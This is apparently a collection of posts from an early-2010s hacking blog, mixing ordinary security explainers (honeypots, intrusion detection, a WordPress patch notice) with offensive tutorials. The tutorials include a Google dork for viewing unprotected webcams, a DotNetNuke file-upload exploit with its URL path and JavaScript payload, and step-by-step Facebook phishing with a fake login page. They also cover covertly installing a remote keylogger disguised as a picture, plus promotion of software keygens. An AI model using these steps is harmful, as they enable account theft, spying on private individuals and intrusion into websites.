Hakin9 is an e-magazine which talks about Ethical Hacking and Security issues, I just came across the its website Hakin9.org and had a look at some magazines they were awesome, So I though to share it here on RHA, This Months Issue is related to Cybercrime and Cyberwar Predictions for 2011 which contains information related to following issues.
Cybercrime and Cyberwar Predictions for 201
The Social Web Threat
Pros and cons of partial passwords in web applications
Target Attacks via Email
Spyware Threat Invades BlackBerry App World
The Social Web Threat
And Much more
So what are you waiting for go ahead and Download Hakin9 magazine for january here
Year 2010 has been a wonderful year here on RHA(Rafay Hacking Articles), We wish you all a very happy 2011 to all of all readers. The Year 2010 has been really amazing in terms of Traffic and Revenue too, We Doubled our Daily Traffic and so as the revenue generated from the blog, I Wrote my first book on Ethical Hacking "A Beginners Guide To Ethical Hacking" and got Interviewed.
Goals For 2011
I have lots of goals for 2011 and some of them are as Follows:
Black hat hacking is the term given to the course of action on protruding into the security system of a computer to get access to the computer network connectivity with out the knowledge of the authentication party. As long as the internet connectivity serves in best message transaction and other such features of information storage, black hat hackers are expected to play their role of hacking the secure private data. There are a variety of hacking tips and techniques that each hacker exploits challenging to crack the system security. We also have certain software applications to make the hacking progression easier. Black hat Hackers makes their toils on the psychological stipulations to inflate the crack deep for passwords and user id of a system. As Security openness is one of the ill-fated and obvious parts of computation structure today.
Black hat tips and techniques
Black hat briefings brings together a team of legislative body from federal organization along with a set of professional and expertise hackers towards a conference on keeping up computer security. Black hat briefings and trainings are being provided from specific vendors who work upon neutralizing the vendor conferencing.
Black hat cloaking is a form of Search Engine Optimization approach where the data passed to the search engine spider is varied from that of the user’s browser. It is performed based on the user agent HTTP header who requests for the page. The rationale of the black hat cloaking is to swindle the search engine to exhibit the page at times of not available to display.
Ollydbg and IDA pro are the effective hacker tools that are well-versed in debugging, which is utilized generally to analysis and sort out the set of codes. Ollydbg is limited to function with 32 bit files while IDA pro can work on 32 as well as 64 bit files.
Usually a computer system or phone or network is being hacked for malevolent motive such as fraudulence over credit cards, identity cards, piracy and theft of data from secure systems. Jonathan James, Adrian Lamom and Kevin Mitnick holds the top place in perfect hacking technique.
Both the black hat hackers and white hat crackers come up with similar pattern of cracking the system’s security to make their job done. In a hacker tool box one can find various tools that are being utilized in hacking course of time as they discover and utilize the network with special softwares to overturn a series of coding.
Author bio
Corliss Jennica, The author of this article has got keen knowledge on bringing out various issues related to the black hat hackers technique. Feel free to contact her on further hacking tips and guidance on computer system security.
Recently I wrote on article on How To Spy and Hack a webcam I received a very good response from readers, However in this article I will show you how to use a simple Google Dork to access unprotected webcams online.There are thousands of unprotected webcams available online, Since many Webcams use known protocols to transmit live video streams over the web, it's often very easy to search for publicly accessible webcams 1.First of all open your Internet browser and visit Google.com
2.Search on Google for the following Keyword "inurl:/view.index.shtml"
3. Next Choose a webcam and Enjoy
Google Dorks
Here is the list of Few Google Dorks used for this purpose:
Adobe Illustrator CS5 software provides precision and power with sophisticated drawing tools, expressive natural brushes, a host of time-savers, and integration with Adobe CS Live online services.I have posted lots of articles on Adobe Photoshop CS5 Serial keys and Adobe CS5 Keygens but lots of people were looking for adobe CS5 Illustrator serial keys instead of Adobe Photoshop CS5 keys, So in this post I am posting a download link to the adobe CS5 Illustrator keygens
In this post I will tell you how you can hack facebook chat application to run it from any windows, Using this hack you will be able to chat with your freinds on other browser pages, So here is the step by step guide to hack facebook chat application. Note:This trick to hack facebook chat application works for firefox browser only 1.First of all log into your Facebook account
4.Next click on the bookmark option at the top beside history button and right click Facebook chat at the bottom and Check load this bookmark in the sidebar and click on ok.
Now you can load Facebook chat application from any browser
First thing any hacker would do to compromise any network is gathering information passively and seeking vulnerable services as well as ports. And this is where Honeypots play a role of fake vulnerability in network. Honeypots are fake theoretically, but not practically. They are real vulnerabilities in Network intentionally kept open & designed to gather information about the possible attack / attacker.
How Honeypots Work?
This fake vulnerability attracts any hacker towards it & he would try to compromise it. The Honeypot will itself stores the data regarding how hacker is trying to break it, what tools he might be using, his intentions, keystrokes and many such things.
This information is useful to network security administrator in many ways. Generally the attack is not done in one shot. Hackers try some initial attacks. And based on its results he hacks into major network flaws after some days.
So Honeypots help security people to secure the networks from the information they have gathered from initial attack. They are called as honey pots only because they are made available in network of vulnerabilities like Honey Comb.
Are Honeypots Vulnerable itself?
Sure they are. There are lot of smart ass hackers – who if anyhow come to know that they are dealing with Honeypots, They can totally screw things up.
Because, they are actually dealing with the system file in the network. So they are already inside it without any breakdown. If they can compromise this fake vulnerability Honeypot i.e. that they can surely break in to the system in less time.
Vulnerability is a vulnerable after all & Honeypots too. But there are very rare chances for attacker to identify it & needs great experience. So, planting Honeypot into any network architecture would be a more secure scenario for any host or network.
About The Author
Amol wagh is a tech blogger and an Ethical hacker, He writes at his blog Hackersengima, If you are interested in writing a guest post on your blog kindly read the guidelines here
We are happy to announce that we will cover a bit a Hacking and security related news too, So if you get any latest security related news kindly sent it to us via our Contact form, Your Full name will also be published along with your News.
Article Format
Title
Description
Proper article with Images(If any)
Name of the Sender
If you came across any Hacking/security related latest announcements or News Kindly sent us via our contact form
In this tutorial I will tell you how hackers use a simple dot net nuke exploit to hack a website, Now the exploit I am talking about is found in hundreds and hundreds on DNN applications and it allows the hacker to upload an image on your server, This type of attack is also called one way Hacking and at the end of article I have also posted some countermeasures to help you defend your self against these kinds of attack You might be interested in reading some related posts at RHA:
A google dork is an act of using google provided search terms to obtain a specific resultand this DNN vulnerability occurs only in those websites which have "/portals/0" in their navigation, So goahead and search for inurl:”/portals/0″ where inurl asks the google to display all the url's who have /portals/0 in their navigation
1.Lets say the vulnerable website is:
www.vulnerablewebsite.com/portals/0
2.Now we will just add Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx after the url so www.vulnerablewebsite.com/portals/0 will become www.vulnerablewebsite.com/portals/0Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3.Now a website is vulnerable to this type of attack you will get a similar windows like the below one:
4.Next enter the following Javascript in the address bar: javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
What this javascript will do is that it will enable us to upload our image to the server:
5.The hacker could upload any image on victims website.
Countermeasures
1.The easiest method is to rename your fcklinkgallery to some thing else but it will not prevent this attack, but you can protect it from script kiddie's in this way, A skilled hacker can easily find the renamed file by using some Footprinting methods
2.Another way to prevent this attack is to upgrade to IIS 7 or higher and a DNN version of 4.9.4 or higher
Feel free to ask if you have any kind of problem with any thing mentioned in this tutorial
Have you accidently Deleted Your Photos from your Hard disk?.Do you want to recover them back?.Then you dont need to panic.It is possible to recover Photos even if you have deleted them even if you have deleted them from recycle bin.In this post i you will find information on How to recover Photos from Windows or Mac.Today there exist hundreds of Photo recovery tools i have personally tested over 20 of them some could not recover Photos in their original condition or neither they are capable of recovering deleted photos.
So it is very much necessary to make the right choice of the Photo recovery software in order to recover deleted Photos back in the original condition. We recommend the following softwares to recover the deleted files:
Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993.
What are the Chances of Recovering my Photos Back?
Since the operating system does not use the space for deleted Photos or Files so its certainly possible to recover Photos in its original condition.The only condition is to act as early as possible before the hard disk re use the deleted space.
Recovering Deleted Photos
In order to recover deleted photos all you need to do is to perform scan and it will perform a scan for deleted Photos.These digital photo recovery utilities are built with highly interactive user interface that makes them easy-to-understand without prior photo recovery experience. Loss of pictures from the storage media can occur under following circumstances:
1.Pulling out the memory card without switching the camera off 2.Accidentally deleting the photographs 3.Formatting the computer hard drive or memory card 4.Corruption or damage of the storage device 5.Corruption or damage of the file system of your computer system 6.Turning off the digital camera during a write process
Visit the following links for more information on Stellar Data Recovery:
Your IP is exposed when ever you visit a website,when your Ip gets exposed it becomes easy to trace you and find out your personal information, Hackers can use your Ip to gain access to your personal files and documents and even can get into your paypal,alert etc accounts,Real IP hide is a Software which masks your IP with one click and you can surf web anonymously,on the other hand Hackers can use this software to hide their identity and not get caught, its benificial for all and i recommend that every Pc should have this software installed
Features
Key Features
Easily Conceal Your IP Address
Anonymous Web Surfing
Advanced Application Support
Protect Your Identity and Stop Hackers
Un-ban Yourself From Forums, Blogs, Etc...
Prevent websites from tracking your online activities
Quickly delete all Internet Explorer and FireFox cookies
Are you curious to "hack facebook password" well then this post is just for you, Most people ask me to tell them the easiest way to hack facebook password, so here are some ways to that hackers take to hack facebook password:
1.Facebook phishing 2.Keylogging 3.Facebook new features 4.virus See my article on 4 ways on how to hack a facebook password for information on the above methods But today we will focus on a method which has a high success rate celled Phishing and keylogging,so first of all:
What is phishing?
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.
Phishing Procedure:
First of all downloadFacebook fake login page (Complete the survey to unlock Facebook fake login page)
1.once you have downloded facebook fake login page now extract contents in a folder
2.Now open pass.php and find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your to is the 'http://www.google.com.pk'
Note:'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com' instead of "http://rafayhackingarticles.blogspot.com"
Now Save it .
3.Now open facebook fake page in a wordpad
4.Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com,www.ripway.com or t35.com.
Note:Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can useooowebhost.
6.Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored
7.Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !
How it works?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked
Keylogging - Easy way:
The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy
1. Sniper Spy (Remote Install Supported)
SniperSpyis the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.
2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
.user - type in the victim’s name .file name - Name the file to be sent. Use the name such that victim will love to accept it. .file icon - keep it the same .picture - select the picture you want to apply to the keylogger. In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.
If you are a Beginner and are interested in learn Hacking from beginning I recommend you reading my book on Ethical hacking "A beginners Guide To Ethical hacking"
Subscribe to our blog and get Facebook Hacking updates,To subscribe click on the button below,dont forgot to click the activation link in your email box
Recently I wrote about Firesheep a firefox plugin in my post Firesheep makes Facebook Hacking easy which uses a sidejacking or session Hijacking attack to acess a Facebook account on a Wifi network, In this tutorial I will tell about an awesome Firefox addon which can be used to detect firesheep on your network to keep it safe, The addon I am talking about is known as "Blacksheep" its code is almost similar to the one for firesheep but the only difference is that it is used for security purposes If some one is using Firesheep on your network you can detect it easily with blacksheep, It pops an image like below if some one is using a firesheep on your network
Note:Blacksheep wont protect sidejacking or session hijacking done by firesheep it can just detect if some one is using firesheep on your network
How to install and use blacksheep?
Here is a video which shows how to use Blacksheep to detect firesheep on your network:
An intrusion detection system (IDS) is used to monitor the entire network, it detects intruders; that is, unexpected, unwanted or unauthorized people or programs on network. An intrusion detection system has a number of sensors that is used to detect unwanted or unexpected flow of network traffic, the major sensors as follows:
A sensor monitor log files
A sensor monitor TCP ingoing or outgoing connections
How Intrusion Detection System Works?
Intrusion detection system works by collecting information and then examining it. IDS collects data from it sensors and analyze this data to give notice to the system administrator about malicious activity on the network.
o An intrusion detection system can be run manually but most IT administrators find it easier to automate the system checks to ensure that nothing is accidentally overlooked. o We can mainly categorize an IDS into two type:
There is still a question, why we use IDS if there is firewall to perform these tasks, Firewall is used to stop unwanted traffic from entering or leaving the internal enterprise network, where as the IDS is deployed to monitor traffic in vital segments in the network, generating alerts when an intrusion is detected.
A firewall has got holes to let things through, without it you wouldn't be able to access the Internet or send or receive emails, there are different ways to bypass or cheat a firewall. Snort is an excellent open source Network Intrusion Detection System, OSSEC is an Open Source Host-based Intrusion Detection System.
Below is an an overview of the basic architecture as well as practical examples of how to customize Open Source Host-based Intrusion Detection System to manage logging from your infrastructure and applications.
About The Author
This is a guest post written by Irfan Shakeel. The author is an Ethical Hacker and Internet searcher and blogs at http://www.beautyofthebaud.co.cc/
Three days back the President of Pakistan's website was hacked by a hacker called "Adil" from Pak cyber army which was restored in 2 days according to the officials, I just heard news that the Hacker Adil(Real Name Shahbaz) has been arrested today from Rawalpindi, The court has handed Shahbaz to the FIA crime wing for three days remand, The hacker shahbaz told FIA that he had done it just for fun
The Fia crime wing has also contacted interpole to inquire about Indian Hackers who are responsible for Hacking Pakistani websites
How was the website Hacked?
I am not really sure that what method the hacker used to deface the website but I am pretty confident that the hacker would had used simple SQL Injection to gain access to the control panel, SQL injection can easily avoided by putting some checks in the codes, For more information on what methods do hacker use to Hack a website and Countermeasure, Kindly read my article Common methods to hack a website
Wordpress has just released it's newest version 3.0.2 fixing a critical security flaw in wordpress 3.0.1, The new version fixes a Security issue which allowed the author level users to gain further access to the website, Wordpress has not mentioned yet that what type of vulnerability was found, All we know that the blogs with Multiple author are vulnerable to this type of attack, So make sure that you update it as soon as possible
Here is the official statement by wordpress:
WordPress 3.0.2 is available and is a mandatory security update for all previous WordPress versions. Haiku has become traditional: Fixed on day zero One-click update makes you safe This used to be hard This maintenance release fixes a moderate security issue that could allow a malicious Author-level user to gain further access to the site, addresses a handful of bugs, and provides some additional security enhancements. Big thanks to Vladimir Kolesnikov for detailed and responsible disclosure of the security issue! Download 3.0.2 or update automatically from the Dashboard > Updates menu in your site’s admin area. You should update immediately even if you do not have untrusted users.